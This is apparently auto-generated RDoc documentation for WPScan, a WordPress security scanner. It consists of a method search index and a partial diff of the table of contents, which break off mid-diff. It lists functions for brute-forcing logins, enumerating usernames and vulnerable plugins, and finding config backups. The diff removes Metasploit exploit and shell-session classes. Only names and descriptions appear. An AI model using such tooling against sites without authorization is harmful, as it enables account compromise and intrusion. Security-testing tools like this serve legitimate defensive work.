achefilestore#read_entry()","wpitem#readme_url()","wpreadme#readme_url()","object#red()","website#redirection()","plugins#register()","plugin#register_options()","plugins#register_plugin()","wptarget#registration_enabled?()","wptarget#registration_url()","wpusernames#remove_junk_from_nickname()","gitupdater#repo_directory_arguments()","object#require_files_from_directory()","browser::reset()","gitupdater#reset_head()","customoptionparser#results()","website#rss_url()","checkerplugin#run()","listgeneratorplugin#run()","plugin#run()","generatelist#save()","wptarget#search_replace_db_2_exists?()","wptarget#search_replace_db_2_url()","generatelist#set_file_name()","wpscanoptions#set_option_from_cli()","wploginprotection#simple_login_lockdown_url()","wptimthumbs#targets_url_from_theme()","wptarget#theme()","wpthemes#themes_from_aggressive_detection()","wpthemes#themes_from_passive_detection()","wpscanoptions#threads=()","wptimthumbs#timthumbs()","wpscanoptions#to_h()","wpitem#to_s()","gitupdater#update()","svnupdater#update()","updater#update()","wptarget#url()","wpscanoptions#url=()","object#usage()","browser#user_agent()","browser#user_agent_mode=()","wpusernames#usernames()","wptarget::valid_response_codes()","wpitem#version()","wptarget#version()","wpversion::version_pattern()","vulnerable#vulnerabilities()","wpscanoptions#wordlist=()","website#wordpress?()","wptarget#wp_content_dir()","wpitem#wp_org_item?()","wpitem#wp_org_url()","wptarget#wp_plugins_dir()","wptarget#wp_plugins_dir_exists?()","cachefilestore#write_entry()","website#xml_rpc_url()","","","",""],"info":[["Array","","Array.html","",""],["Browser","","Browser.html","",""],["BruteForce","","BruteForce.html","",""],["CacheFileStore","","CacheFileStore.html","",""],["CheckerPlugin","","CheckerPlugin.html","","\nWPScan - WordPress Security Scanner\nCopyright (C) 2012-2013\n\nThis program is free software: you can redistribute ...\n"],["CustomOptionParser","","CustomOptionParser.html","","\nWPScan - WordPress Security Scanner\nCopyright (C) 2012-2013\n\nThis program is free software: you can redistribute ...\n"],["GenerateList","","GenerateList.html","","This tool generates a list to use for plugin and theme enumeration\n"],["GitUpdater","","GitUpdater.html","",""],["ListGeneratorPlugin","","ListGeneratorPlugin.html","","\n
WPScan - WordPress Security Scanner\nCopyright (C) 2012-2013\n\nThis program is free software: you can redistribute ...\n"],["Malwares","","Malwares.html","",""],["Object","","Object.html","",""],["Plugin","","Plugin.html","","\nWPScan - WordPress Security Scanner\nCopyright (C) 2012-2013\n\nThis program is free software: you can redistribute ...\n"],["Plugins","","Plugins.html","","\nWPScan - WordPress Security Scanner\nCopyright (C) 2012-2013\n\nThis program is free software: you can redistribute ...\n"],["SvnParser","","SvnParser.html","","This Class Parses SVN Repositories via HTTP\n"],["SvnUpdater","","SvnUpdater.html","",""],["URI","","URI.html","",""],["Updater","","Updater.html","","
This class act as an absract one\n"],["UpdaterFactory","","UpdaterFactory.html","",""],["Vulnerable","","Vulnerable.html","",""],["WebSite","","WebSite.html","",""],["WpConfigBackup","","WpConfigBackup.html","",""],["WpDetector","","WpDetector.html","",""],["WpEnumerator","","WpEnumerator.html","","
Enumerate over a given set of items and check if they exist\n"],["WpFullPathDisclosure","","WpFullPathDisclosure.html","",""],["WpItem","","WpItem.html","",""],["WpLoginProtection","","WpLoginProtection.html","",""],["WpOptions","","WpOptions.html","","
Options Hash\n
Options\n
url- The base URL of the WordPress site\n"],["WpPlugin","","WpPlugin.html","",""],["WpPlugins","","WpPlugins.html","",""],["WpReadme","","WpReadme.html","",""],["WpTarget","","WpTarget.html","",""],["WpTheme","","WpTheme.html","",""],["WpThemes","","WpThemes.html","",""],["WpTimthumbs","","WpTimthumbs.html","",""],["WpUser","","WpUser.html","",""],["WpUsernames","","WpUsernames.html","",""],["WpVersion","","WpVersion.html","",""],["WpVulnerability","","WpVulnerability.html","",""],["WpscanOptions","","WpscanOptions.html","",""],["<=>","WpItem","WpItem.html#method-i-3C-3D-3E","(other)","Compare\n"],["<=>","WpUser","WpUser.html#method-i-3C-3D-3E","(item)",""],["==","WpItem","WpItem.html#method-i-3D-3D","(other)","
Compare\n"],["===","WpItem","WpItem.html#method-i-3D-3D-3D","(other)","
Compare\n"],["===","WpTheme","WpTheme.html#method-i-3D-3D-3D","(wp_theme)",""],["===","WpUser","WpUser.html#method-i-3D-3D-3D","(item)",""],["_grep_","Array","Array.html#method-i-_grep_","(regexp)","
Fix for grep with symbols in ruby <= 1.8.7\n"],["add","CustomOptionParser","CustomOptionParser.html#method-i-add","(options)","
param Array(Array) or Array options\n"],["add_http_protocol","Object","Object.html#method-i-add_http_protocol","(url)","
Add protocol\n"],["add_option","CustomOptionParser","CustomOptionParser.html#method-i-add_option","(option)","
param Array option\n"],["add_trailing_slash","Object","Object.html#method-i-add_trailing_slash","(url)",""],["aggressive_detection","WpDetector","WpDetector.html#method-c-aggressive_detection","(options, items = [])",""],["author_url","WpUsernames","WpUsernames.html#method-i-author_url","(author_id)",""],["available_updaters_classes","UpdaterFactory","UpdaterFactory.html#method-c-available_updaters_classes","()","
return array of class symbols\n"],["banner","Object","Object.html#method-i-banner","()","
our 1337 banner\n"],["basic_auth=","WpscanOptions","WpscanOptions.html#method-i-basic_auth-3D","(basic_auth)",""],["better_wp_security_url","WpLoginProtection","WpLoginProtection.html#method-i-better_wp_security_url","()",""],["bluetrait_event_viewer_url","WpLoginProtection","WpLoginProtection.html#method-i-bluetrait_event_viewer_url","()",""],["brute_force","BruteForce","BruteForce.html#method-i-brute_force","(logins, wordlist_path, options = {})","
param array of string logins param string wordlist_path param hash options\n\n
boolean :show_progression If ...\n"],["changelog_url","WpItem","WpItem.html#method-i-changelog_url","()","Url for changelog.txt\n"],["check_local_vulnerable_files","CheckerPlugin","CheckerPlugin.html#method-i-check_local_vulnerable_files","(dir_to_scan)",""],["check_options","WpOptions","WpOptions.html#method-c-check_options","(options)",""],["check_vuln_ref_urls","CheckerPlugin","CheckerPlugin.html#method-i-check_vuln_ref_urls","()",""],["clean","CacheFileStore","CacheFileStore.html#method-i-clean","()",""],["clean_option","WpscanOptions","WpscanOptions.html#method-c-clean_option","(option)","
Will removed the ‘-’ or ‘–’ chars at the beginning of option and replace\nany remaining ‘-’ by ‘_’\n
param …\n"],["colorize","Object","Object.html#method-i-colorize","(text, color_code)",""],["config_backup","WpConfigBackup","WpConfigBackup.html#method-i-config_backup","()","
Checks to see if wp-config.php has a backup See www.feross.org/cmsploit/\nreturn an array of backup config …\n"],["config_backup_files","WpConfigBackup","WpConfigBackup.html#method-c-config_backup_files","()","
@return Array\n"],["debug_log_url","WpTarget","WpTarget.html#method-i-debug_log_url","()",""],["directory_listing?","WpItem","WpItem.html#method-i-directory_listing-3F","()","
Is directory listing enabled?\n"],["enumerate","WpEnumerator","WpEnumerator.html#method-c-enumerate","(options = {}, items = nil)","
Enumerate the given Targets\n
Attributes\n
targets- targets to enumerate\n"],["enumerate_all_plugins=","WpscanOptions","WpscanOptions.html#method-i-enumerate_all_plugins-3D","(enumerate_all_plugins)",""],["enumerate_all_themes=","WpscanOptions","WpscanOptions.html#method-i-enumerate_all_themes-3D","(enumerate_all_themes)",""],["enumerate_only_vulnerable_plugins=","WpscanOptions","WpscanOptions.html#method-i-enumerate_only_vulnerable_plugins-3D","(enumerate_only_vulnerable_plugins)",""],["enumerate_only_vulnerable_themes=","WpscanOptions","WpscanOptions.html#method-i-enumerate_only_vulnerable_themes-3D","(enumerate_only_vulnerable_themes)",""],["enumerate_options_from_string","WpscanOptions","WpscanOptions.html#method-i-enumerate_options_from_string","(value)","Will set enumerate_* from the string value IE : if value = vp =>\n:enumerate_only_vulnerable_plugins …\n"],["enumerate_plugins=","WpscanOptions","WpscanOptions.html#method-i-enumerate_plugins-3D","(enumerate_plugins)",""],["enumerate_themes=","WpscanOptions","WpscanOptions.html#method-i-enumerate_themes-3D","(enumerate_themes)",""],["eql?","WpUser","WpUser.html#method-i-eql-3F","(item)",""],["error_404_hash","WebSite","WebSite.html#method-i-error_404_hash","()","
Return the MD5 hash of a 404 page\n"],["error_log?","WpPlugin","WpPlugin.html#method-i-error_log-3F","()","
Discover any error_log files created by WordPress These are created by the\nWordPress error_log() function …\n"],["error_log_url","WpPlugin","WpPlugin.html#method-i-error_log_url","()",""],["escape","URI","URI.html#method-c-escape","(str)",""],["extract_name_from_url","WpItem","WpItem.html#method-i-extract_name_from_url","()","
Extract item name from a url\n"],["extract_nickname_from_body","WpUsernames","WpUsernames.html#method-i-extract_nickname_from_body","(body)",""],["find","WpTheme","WpTheme.html#method-c-find","(target_uri)",""],["find","WpVersion","WpVersion.html#method-c-find","(target_uri, wp_content_dir)","
Will use all method self.find_from_* to try to detect the version Once the\nversion is found, it will …\n"],["find_from_advanced_fingerprinting","WpVersion","WpVersion.html#method-c-find_from_advanced_fingerprinting","(options)","
Uses data/wp_versions.xml to try to identify a wordpress version.\n
It does this by using client side file …\n"],["find_from_atom_generator","WpVersion","WpVersion.html#method-c-find_from_atom_generator","(options)","
Attempts to find the WordPress version from, the generator tag in the Atom\nsource.\n"],["find_from_css_link","WpTheme","WpTheme.html#method-c-find_from_css_link","(target_uri)","
Discover the wordpress theme name by parsing the css link rel\n"],["find_from_links_opml","WpVersion","WpVersion.html#method-c-find_from_links_opml","(options)","
Attempts to find the WordPress version from the p-links-opml.php file.\n"],["find_from_meta_generator","WpVersion","WpVersion.html#method-c-find_from_meta_generator","(options)","
Attempts to find the wordpress version from, the generator meta tag in the\nhtml source.\n
The meta tag can …\n"],["find_from_rdf_generator","WpVersion","WpVersion.html#method-c-find_from_rdf_generator","(options)","
Attempts to find WordPress version from, the generator tag in the RDF feed\nsource.\n"],["find_from_readme","WpVersion","WpVersion.html#method-c-find_from_readme","(options)","
Attempts to find the WordPress version from the readme.html file.\n"],["find_from_rss_generator","WpVersion","WpVersion.html#method-c-find_from_rss_generator","(options)","
Attempts to find the WordPress version from, the generator tag in the RSS\nfeed source.\n"],["find_from_sitemap_generator","WpVersion","WpVersion.html#method-c-find_from_sitemap_generator","(options)","
Attempts to find the WordPress version from the sitemap.xml file.\n
See: code.google.com/p/wpscan/issues/detail?id=109 …\n"],["find_from_wooframework","WpTheme","WpTheme.html#method-c-find_from_wooframework","(target_uri)","
code.google.com/p/wpscan/issues/detail?id=141\n"],["forge_request","Browser","Browser.html#method-i-forge_request","(url, params = {})",""],["full_path_disclosure_url","WpFullPathDisclosure","WpFullPathDisclosure.html#method-i-full_path_disclosure_url","()",""],["generate_full_list","GenerateList","GenerateList.html#method-i-generate_full_list","()",""],["generate_items","WpEnumerator","WpEnumerator.html#method-c-generate_items","(options = {})",""],["generate_popular_list","GenerateList","GenerateList.html#method-i-generate_popular_list","(pages)",""],["get","Browser","Browser.html#method-i-get","(url, params = {})",""],["get_entry_file_path","CacheFileStore","CacheFileStore.html#method-i-get_entry_file_path","(key)",""],["get_equal_string_end","Object","Object.html#method-i-get_equal_string_end","(stringarray = [\"\"])","
Gets the string all elements in stringarray ends with\n"],["get_full_url","WpItem","WpItem.html#method-i-get_full_url","()","
Get the full url for this item\n"],["get_metasploit_url","Object","Object.html#method-i-get_metasploit_url","(module_path)",""],["get_nickname_from_response","WpUsernames","WpUsernames.html#method-i-get_nickname_from_response","(resp)",""],["get_nickname_from_url","WpUsernames","WpUsernames.html#method-i-get_nickname_from_url","(url)",""],["get_opt_long","WpscanOptions","WpscanOptions.html#method-c-get_opt_long","()","
Even if a short option is given (IE : -u), the long one will be returned\n(IE : –url)\n"],["get_popular_items","GenerateList","GenerateList.html#method-i-get_popular_items","(pages)","
Send a HTTP request to the WordPress most popular theme or plugin webpage\nparse the response for the …\n"],["get_sub_folder","WpItem","WpItem.html#method-i-get_sub_folder","()",""],["get_updater","UpdaterFactory","UpdaterFactory.html#method-c-get_updater","(repo_directory)",""],["get_url_without_filename","WpItem","WpItem.html#method-i-get_url_without_filename","()","
Gets the full url for this item without filenames\n"],["green","Object","Object.html#method-i-green","(text)",""],["grep","Array","Array.html#method-i-grep","(regexp)",""],["has_basic_auth?","WebSite","WebSite.html#method-i-has_basic_auth-3F","()",""],["has_better_wp_security_protection?","WpLoginProtection","WpLoginProtection.html#method-i-has_better_wp_security_protection-3F","()","
wordpress.org/extend/plugins/better-wp-security/\n"],["has_bluetrait_event_viewer_protection?","WpLoginProtection","WpLoginProtection.html#method-i-has_bluetrait_event_viewer_protection-3F","()","
wordpress.org/extend/plugins/bluetrait-event-viewer/\n"],["has_changelog?","WpItem","WpItem.html#method-i-has_changelog-3F","()","
changelog.txt present?\n"],["has_debug_log?","WpTarget","WpTarget.html#method-i-has_debug_log-3F","()",""],["has_full_path_disclosure?","WpFullPathDisclosure","WpFullPathDisclosure.html#method-i-has_full_path_disclosure-3F","()","
Check for Full Path Disclosure (FPD)\n"],["has_limit_login_attempts_protection?","WpLoginProtection","WpLoginProtection.html#method-i-has_limit_login_attempts_protection-3F","()","
wordpress.org/extend/plugins/limit-login-attempts/\n"],["has_local_changes?","GitUpdater","GitUpdater.html#method-i-has_local_changes-3F","()",""],["has_login_lock_protection?","WpLoginProtection","WpLoginProtection.html#method-i-has_login_lock_protection-3F","()","
wordpress.org/extend/plugins/login-lock/\n"],["has_login_lockdown_protection?","WpLoginProtection","WpLoginProtection.html#method-i-has_login_lockdown_protection-3F","()","
Thanks to Alip Aswalid for providing this method.\nwordpress.org/extend/plugins/login-lockdown/\n"],["has_login_protection?","WpLoginProtection","WpLoginProtection.html#method-i-has_login_protection-3F","()",""],["has_login_security_solution_protection?","WpLoginProtection","WpLoginProtection.html#method-i-has_login_security_solution_protection-3F","()","
wordpress.org/extend/plugins/login-security-solution/\n"],["has_malwares?","Malwares","Malwares.html#method-i-has_malwares-3F","(malwares_file_path = nil)",""],["has_options?","WpscanOptions","WpscanOptions.html#method-i-has_options-3F","()",""],["has_readme?","WpItem","WpItem.html#method-i-has_readme-3F","()","
readme.txt present?\n"],["has_readme?","WpReadme","WpReadme.html#method-i-has_readme-3F","()","
Checks to see if the readme.html file exists\n
This file comes by default in a wordpress installation, and …\n"],["has_simple_login_lockdown_protection?","WpLoginProtection","WpLoginProtection.html#method-i-has_simple_login_lockdown_protection-3F","()","
wordpress.org/extend/plugins/simple-login-lockdown/\n"],["has_timthumbs?","WpTimthumbs","WpTimthumbs.html#method-i-has_timthumbs-3F","(theme_name, options = {})",""],["has_xml_rpc?","WebSite","WebSite.html#method-i-has_xml_rpc-3F","()",""],["help","Object","Object.html#method-i-help","()","
command help\n"],["homepage_hash","WebSite","WebSite.html#method-i-homepage_hash","()",""],["id","WpUser","WpUser.html#method-i-id","()",""],["id=","WpUser","WpUser.html#method-i-id-3D","(new_id)",""],["instance","Browser","Browser.html#method-c-instance","(options = {})",""],["is_installed?","GitUpdater","GitUpdater.html#method-i-is_installed-3F","()",""],["is_installed?","SvnUpdater","SvnUpdater.html#method-i-is_installed-3F","()",""],["is_installed?","Updater","Updater.html#method-i-is_installed-3F","()",""],["is_long_option?","WpscanOptions","WpscanOptions.html#method-c-is_long_option-3F","(option)",""],["is_multisite?","WpTarget","WpTarget.html#method-i-is_multisite-3F","()",""],["limit_login_attempts_url","WpLoginProtection","WpLoginProtection.html#method-i-limit_login_attempts_url","()",""],["lines_in_file","BruteForce","BruteForce.html#method-c-lines_in_file","(file_path)","
Counts the number of lines in the wordlist It can take a couple of minutes\non large wordlists, although …\n"],["load_config","Browser","Browser.html#method-i-load_config","(config_file = nil)","
TODO reload hydra (if the .load_config is called on a browser object, hydra\nwill not have the new @max_threads …\n"],["load_from_arguments","WpscanOptions","WpscanOptions.html#method-c-load_from_arguments","()","
Will load the options from ARGV return WpscanOptions\n"],["local_revision_number","GitUpdater","GitUpdater.html#method-i-local_revision_number","()","
Git has not a revsion number like SVN, so we will take the 7 first chars of\nthe last commit hash\n"],["local_revision_number","SvnUpdater","SvnUpdater.html#method-i-local_revision_number","()",""],["local_revision_number","Updater","Updater.html#method-i-local_revision_number","()",""],["login_protection_plugin","WpLoginProtection","WpLoginProtection.html#method-i-login_protection_plugin","()","
Checks if a login protection plugin is enabled\ncode.google.com/p/wpscan/issues/detail?id=111 return a …\n"],["login_security_solution_url","WpLoginProtection","WpLoginProtection.html#method-i-login_security_solution_url","()",""],["login_url","WpTarget","WpTarget.html#method-i-login_url","()",""],["malware_pattern","Malwares","Malwares.html#method-c-malware_pattern","(url_regex)",""],["malwares","Malwares","Malwares.html#method-i-malwares","(malwares_file_path = nil)","
return array of string (url of malwares found)\n"],["malwares_file","Malwares","Malwares.html#method-c-malwares_file","(malwares_file_path)",""],["max_threads=","Browser","Browser.html#method-i-max_threads-3D","(max_threads)",""],["merge_request_params","Browser","Browser.html#method-i-merge_request_params","(params = {})",""],["name","WpUser","WpUser.html#method-i-name","()",""],["name=","WpUser","WpUser.html#method-i-name-3D","(new_name)",""],["new","CacheFileStore","CacheFileStore.html#method-c-new","(storage_path, serializer = Marshal)","
The serializer must have the 2 methods .load and .dump (Marshal and YAML\nhave them) YAML is Human Readable …\n"],["new","CheckerPlugin","CheckerPlugin.html#method-c-new","()",""],["new","CustomOptionParser","CustomOptionParser.html#method-c-new","(banner = nil, width = 32, indent = ' ' * 4)",""],["new","GenerateList","GenerateList.html#method-c-new","(type, verbose)","
type = themes | plugins\n"],["new","ListGeneratorPlugin","ListGeneratorPlugin.html#method-c-new","()",""],["new","Plugin","Plugin.html#method-c-new","(infos = {})",""],["new","Plugins","Plugins.html#method-c-new","(option_parser = nil)",""],["new","SvnParser","SvnParser.html#method-c-new","(svn_root)",""],["new","Updater","Updater.html#method-c-new","(repo_directory = nil)","
TODO : add a last ‘/ to repo_directory if it’s not present\n"],["new","WpItem","WpItem.html#method-c-new","(options)",""],["new","WpPlugin","WpPlugin.html#method-c-new","(options = {})",""],["new","WpTarget","WpTarget.html#method-c-new","(target_url, options = {})",""],["new","WpTheme","WpTheme.html#method-c-new","(options = {})",""],["new","WpUser","WpUser.html#method-c-new","(name, id, nickname)",""],["new","WpVersion","WpVersion.html#method-c-new","(number, options = {})",""],["new","WpVulnerability","WpVulnerability.html#method-c-new","(title, references, type, metasploit_modules)",""],["new","WpscanOptions","WpscanOptions.html#method-c-new","()",""],["nickname","WpUser","WpUser.html#method-i-nickname","()",""],["nickname=","WpUser","WpUser.html#method-i-nickname-3D","(new_nickname)",""],["online?","WebSite","WebSite.html#method-i-online-3F","()","
Checks if the remote website is up.\n"],["option_to_instance_variable_setter","WpscanOptions","WpscanOptions.html#method-c-option_to_instance_variable_setter","(option)",""],["option_to_symbol","CustomOptionParser","CustomOptionParser.html#method-c-option_to_symbol","(option)","
param Array option\n"],["output_vulnerabilities","Object","Object.html#method-i-output_vulnerabilities","(vulns)",""],["page_hash","WebSite","WebSite.html#method-c-page_hash","(url)","
Return the MD5 hash of the page given by url\n"],["parse","SvnParser","SvnParser.html#method-i-parse","()",""],["passive_detection","WpDetector","WpDetector.html#method-c-passive_detection","(url, type, wp_content_dir)","
plugins and themes can be found in the source code :\n\n
<script src='http://example.com/wp-content/plugins/s2member/...' ...\n"],["plugins_from_aggressive_detection","WpPlugins","WpPlugins.html#method-i-plugins_from_aggressive_detection","(options)","Enumerate installed plugins.\n
return array of WpPlugin\n"],["plugins_from_passive_detection","WpPlugins","WpPlugins.html#method-i-plugins_from_passive_detection","(options)","
code.google.com/p/wpscan/issues/detail?id=42 plugins can be found in the\nsource code :\n\n
<script src='http://example.com/wp-content/plugins/s2member/...' ...\n"],["post","Browser","Browser.html#method-i-post","(url, params = {})",""],["proxy=","WpscanOptions","WpscanOptions.html#method-i-proxy-3D","(proxy)",""],["proxy_auth=","Browser","Browser.html#method-i-proxy_auth-3D","(auth)",""],["proxy_auth=","WpscanOptions","WpscanOptions.html#method-i-proxy_auth-3D","(auth)",""],["puts","Object","Object.html#method-i-puts","(o = \"\")","Override for puts to enable logging\n"],["raise_invalid_proxy_format","Browser","Browser.html#method-i-raise_invalid_proxy_format","()",""],["read_entry","CacheFileStore","CacheFileStore.html#method-i-read_entry","(key)",""],["readme_url","WpItem","WpItem.html#method-i-readme_url","()","
Url for readme.txt\n"],["readme_url","WpReadme","WpReadme.html#method-i-readme_url","()",""],["red","Object","Object.html#method-i-red","(text)",""],["redirection","WebSite","WebSite.html#method-i-redirection","(url = nil)","
See if the remote url returns 30x redirect This method is recursive Return\na string with the redirection …\n"],["register","Plugins","Plugins.html#method-i-register","(*plugins)","
param Array(Plugin) plugins\n"],["register_options","Plugin","Plugin.html#method-i-register_options","(*options)","
param Array options\n"],["register_plugin","Plugins","Plugins.html#method-i-register_plugin","(plugin)","
param Plugin plugin\n"],["registration_enabled?","WpTarget","WpTarget.html#method-i-registration_enabled-3F","()","
Should check wp-login.php if registration is enabled or not\n"],["registration_url","WpTarget","WpTarget.html#method-i-registration_url","()",""],["remove_junk_from_nickname","WpUsernames","WpUsernames.html#method-i-remove_junk_from_nickname","(usernames)",""],["repo_directory_arguments","GitUpdater","GitUpdater.html#method-i-repo_directory_arguments","()",""],["require_files_from_directory","Object","Object.html#method-i-require_files_from_directory","(absolute_dir_path, files_pattern = \"*.rb\")","
TODO : add an exclude pattern ?\n"],["reset","Browser","Browser.html#method-c-reset","()",""],["reset_head","GitUpdater","GitUpdater.html#method-i-reset_head","()",""],["results","CustomOptionParser","CustomOptionParser.html#method-i-results","(argv = default_argv)","
return Hash\n"],["rss_url","WebSite","WebSite.html#method-i-rss_url","()","
Will try to find the rss url in the homepage Only the first one found iw\nreturned\n"],["run","CheckerPlugin","CheckerPlugin.html#method-i-run","(options = {})",""],["run","ListGeneratorPlugin","ListGeneratorPlugin.html#method-i-run","(options = {})",""],["run","Plugin","Plugin.html#method-i-run","(options = {})",""],["save","GenerateList","GenerateList.html#method-i-save","(items)","
Save the file\n"],["search_replace_db_2_exists?","WpTarget","WpTarget.html#method-i-search_replace_db_2_exists-3F","()",""],["search_replace_db_2_url","WpTarget","WpTarget.html#method-i-search_replace_db_2_url","()","
Script for replacing strings in wordpress databases reveals databse\ncredentials after hitting submit …\n"],["set_file_name","GenerateList","GenerateList.html#method-i-set_file_name","(type)",""],["set_option_from_cli","WpscanOptions","WpscanOptions.html#method-i-set_option_from_cli","(cli_option, cli_value)","
string cli_option : –url, -u, –proxy etc string cli_value : the option\nvalue\n"],["simple_login_lockdown_url","WpLoginProtection","WpLoginProtection.html#method-i-simple_login_lockdown_url","()",""],["targets_url_from_theme","WpTimthumbs","WpTimthumbs.html#method-i-targets_url_from_theme","(theme_name, options)",""],["theme","WpTarget","WpTarget.html#method-i-theme","()","
return WpTheme\n"],["themes_from_aggressive_detection","WpThemes","WpThemes.html#method-i-themes_from_aggressive_detection","(options)",""],["themes_from_passive_detection","WpThemes","WpThemes.html#method-i-themes_from_passive_detection","(options)",""],["threads=","WpscanOptions","WpscanOptions.html#method-i-threads-3D","(threads)",""],["timthumbs","WpTimthumbs","WpTimthumbs.html#method-i-timthumbs","(theme_name = nil, options = {})",""],["to_h","WpscanOptions","WpscanOptions.html#method-i-to_h","()","
return Hash\n"],["to_s","WpItem","WpItem.html#method-i-to_s","()","
To string. Adds a version number if detected\n"],["update","GitUpdater","GitUpdater.html#method-i-update","()",""],["update","SvnUpdater","SvnUpdater.html#method-i-update","()",""],["update","Updater","Updater.html#method-i-update","()",""],["url","WpTarget","WpTarget.html#method-i-url","()","
Alias of @uri.to_s\n"],["url=","WpscanOptions","WpscanOptions.html#method-i-url-3D","(url)",""],["usage","Object","Object.html#method-i-usage","()","
wpscan usage\n"],["user_agent","Browser","Browser.html#method-i-user_agent","()","
return the user agent, according to the user_agent_mode\n"],["user_agent_mode=","Browser","Browser.html#method-i-user_agent_mode-3D","(ua_mode)",""],["usernames","WpUsernames","WpUsernames.html#method-i-usernames","(options = {})","
Enumerate wordpress usernames by using Veronica Valeros’s technique:\nseclists.org/fulldisclosure/2011/May/493 …\n"],["valid_response_codes","WpTarget","WpTarget.html#method-c-valid_response_codes","()","
Valid HTTP return codes\n"],["version","WpItem","WpItem.html#method-i-version","()","
Returns version number from readme.txt if it exists\n"],["version","WpTarget","WpTarget.html#method-i-version","()","
return WpVersion\n"],["version_pattern","WpVersion","WpVersion.html#method-c-version_pattern","()","
Used to check if the version is correct: must contain at least one dot.\n"],["vulnerabilities","Vulnerable","Vulnerable.html#method-i-vulnerabilities","()","
@return an array of WpVulnerability (can be empty)\n"],["wordlist=","WpscanOptions","WpscanOptions.html#method-i-wordlist-3D","(wordlist)",""],["wordpress?","WebSite","WebSite.html#method-i-wordpress-3F","()","
check if the remote website is actually running wordpress.\n"],["wp_content_dir","WpTarget","WpTarget.html#method-i-wp_content_dir","()",""],["wp_org_item?","WpItem","WpItem.html#method-i-wp_org_item-3F","()","
returns true if this theme or plugin is hosted on wordpress.org\n"],["wp_org_url","WpItem","WpItem.html#method-i-wp_org_url","()","
The wordpress.org plugins directory URL See:\ngithub.com/wpscanteam/wpscan/issues/100\n"],["wp_plugins_dir","WpTarget","WpTarget.html#method-i-wp_plugins_dir","()",""],["wp_plugins_dir_exists?","WpTarget","WpTarget.html#method-i-wp_plugins_dir_exists-3F","()",""],["write_entry","CacheFileStore","CacheFileStore.html#method-i-write_entry","(key, data_to_store, cache_timeout)",""],["xml_rpc_url","WebSite","WebSite.html#method-i-xml_rpc_url","()",""],["CREDITS","","CREDITS.html","","
*CREDITS*\n
This file is to give credit to WPScan’s contributors. If you feel your name\nshould be in here, …\n"],["Gemfile","","Gemfile.html","","
source “rubygems.org”\n
gem “typhoeus”, “0.4.2” gem “nokogiri” gem …\n"],["README","","README.html","","
__\n\n
__ _______ _____\n\\ \\ / / __ \\ / ____|\n \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ...\n"],["log","","log_txt.html","","__\n\n
__ _______ _____ \n\\ \\ / / __ \\ / ____| \n \\ \\ /\\ ...\n"]]}} \ No newline at end of file diff --git a/doc/table_of_contents.html b/doc/table_of_contents.html index e7030919..f7e38ced 100644 --- a/doc/table_of_contents.html +++ b/doc/table_of_contents.html @@ -49,6 +49,9 @@SPONSOR=== ++ log + @@ -67,13 +70,19 @@ CacheFileStore- Exploit + CheckerPlugin - Generate_List + CustomOptionParser + ++ GenerateList GitUpdater + ++ ListGeneratorPlugin Malwares @@ -82,13 +91,16 @@ Object - RpcClient + Plugin + ++ Plugins + ++ SvnParser SvnUpdater - -- Svn_Parser URI @@ -229,36 +241,44 @@ ::malwares_file — Malwares - ::new — WpPlugin + ::new — WpItem ::new — WpscanOptions - ::new — WpVulnerability + ::new — Updater - ::new — WpVersion + ::new — Plugin - ::new — WpItem + ::new — WpPlugin ::new — WpTarget - ::new — WpUser - - ::new — CacheFileStore - - ::new — Updater - - ::new — Exploit - - ::new — RpcClient - - ::new — Generate_List - - ::new — Svn_Parser + ::new — CustomOptionParser ::new — WpTheme + ::new — CacheFileStore + + ::new — CheckerPlugin + + ::new — WpVersion + + ::new — SvnParser + + ::new — WpVulnerability + + ::new — ListGeneratorPlugin + + ::new — WpUser + + ::new — GenerateList + + ::new — Plugins + ::option_to_instance_variable_setter — WpscanOptions + ::option_to_symbol — CustomOptionParser + ::page_hash — WebSite ::passive_detection — WpDetector @@ -275,19 +295,21 @@ #== — WpItem + #=== — WpItem + #=== — WpUser #=== — WpTheme - #=== — WpItem - #_grep_ — Array + #add — CustomOptionParser + #add_http_protocol — Object - #add_trailing_slash — Object + #add_option — CustomOptionParser - #authenticate — RpcClient + #add_trailing_slash — Object #author_url — WpUsernames @@ -303,7 +325,9 @@ #changelog_url — WpItem - #choose_session — Exploit + #check_local_vulnerable_files — CheckerPlugin + + #check_vuln_ref_urls — CheckerPlugin #clean — CacheFileStore @@ -337,12 +361,6 @@ #error_log_url — WpPlugin - #exploit — Exploit - - #exploit — RpcClient - - #exploit_info — Exploit - #extract_name_from_url — WpItem #extract_nickname_from_body — WpUsernames @@ -351,9 +369,9 @@ #full_path_disclosure_url — WpFullPathDisclosure - #generate_full_list — Generate_List + #generate_full_list — GenerateList - #generate_popular_list — Generate_List + #generate_popular_list — GenerateList #get — Browser @@ -361,19 +379,15 @@ #get_equal_string_end — Object - #get_exploit_info — RpcClient - #get_full_url — WpItem + #get_metasploit_url — Object + #get_nickname_from_response — WpUsernames #get_nickname_from_url — WpUsernames - #get_options — RpcClient - - #get_payloads — RpcClient - - #get_popular_items — Generate_List + #get_popular_items — GenerateList #get_sub_folder — WpItem @@ -397,6 +411,8 @@ #has_limit_login_attempts_protection? — WpLoginProtection + #has_local_changes? — GitUpdater + #has_login_lock_protection? — WpLoginProtection #has_login_lockdown_protection? — WpLoginProtection @@ -409,10 +425,10 @@ #has_options? — WpscanOptions - #has_readme? — WpItem - #has_readme? — WpReadme + #has_readme? — WpItem + #has_simple_login_lockdown_protection? — WpLoginProtection #has_timthumbs? — WpTimthumbs @@ -427,24 +443,14 @@ #id= — WpUser - #is_installed? — Updater + #is_installed? — GitUpdater #is_installed? — SvnUpdater - #is_installed? — GitUpdater + #is_installed? — Updater #is_multisite? — WpTarget - #job_id — Exploit - - #jobs — RpcClient - - #kill_session — Exploit - - #kill_session — RpcClient - - #last_session_id — Exploit - #limit_login_attempts_url — WpLoginProtection #load_config — Browser @@ -455,8 +461,6 @@ #local_revision_number — GitUpdater - #login — RpcClient - #login_protection_plugin — WpLoginProtection #login_security_solution_url — WpLoginProtection @@ -469,14 +473,6 @@ #merge_request_params — Browser - #meterpreter_read — RpcClient - - #meterpreter_read — Exploit - - #meterpreter_write — RpcClient - - #meterpreter_write — Exploit - #name — WpUser #name= — WpUser @@ -487,7 +483,9 @@ #online? — WebSite - #parse — Svn_Parser + #output_vulnerabilities — Object + + #parse — SvnParser #plugins_from_aggressive_detection — WpPlugins @@ -501,24 +499,26 @@ #proxy_auth= — Browser - #raise_invalid_proxy_format — Browser + #puts — Object - #raise_must_be_implemented — Updater + #raise_invalid_proxy_format — Browser #read_entry — CacheFileStore - #read_shell — Exploit - - #read_shell — 